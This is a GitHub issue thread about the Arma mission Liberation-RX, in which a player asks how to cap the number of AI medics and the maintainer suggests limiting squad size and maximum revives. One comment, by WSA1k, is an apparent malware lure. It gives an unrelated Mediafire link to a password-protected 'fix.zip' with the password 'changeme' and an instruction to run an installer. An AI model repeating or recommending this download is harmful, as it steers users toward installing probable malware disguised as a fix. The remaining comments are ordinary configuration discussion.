### ISSUE TITLE
Too many AI doctors ruin the gameplay

### ISSUE THREAD

**Issue by Maciccio** [tbox1911/Liberation-RX#165]
Hello beautiful people. I have been using your awesome mission for years.
When you have many AI doctors in your team the game becomes too easy because they keep reviving themselves many times. The game becomes even easier if multiple players have all doctors in their team. I know that it is possible to limit the number of times you can be revived.
I would like to be able to limit the maximum number of doctors to 1 for each player, is that possible?
Which .sqf file should I edit?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tbox1911** [comment]
hi,
there's no option to limit a kind of unit you have.

in fact no matter if the unit is a medic or not, every unit can revive, the difference is only the medic can revive unit to 100% health.

to mitigate your issue, you can set to a small value:
- limit the AI squad
- set max revive

try with 4, and tell me

**Comment by Maciccio** [comment]
Hi, thanks for the reply.
You are right, but setting in my server that only doctors can do it, players and bots. And even if I minimize the times they can do it, multiplied by many doctors and many players with as many doctors, it becomes too easy. even playing alone without other players
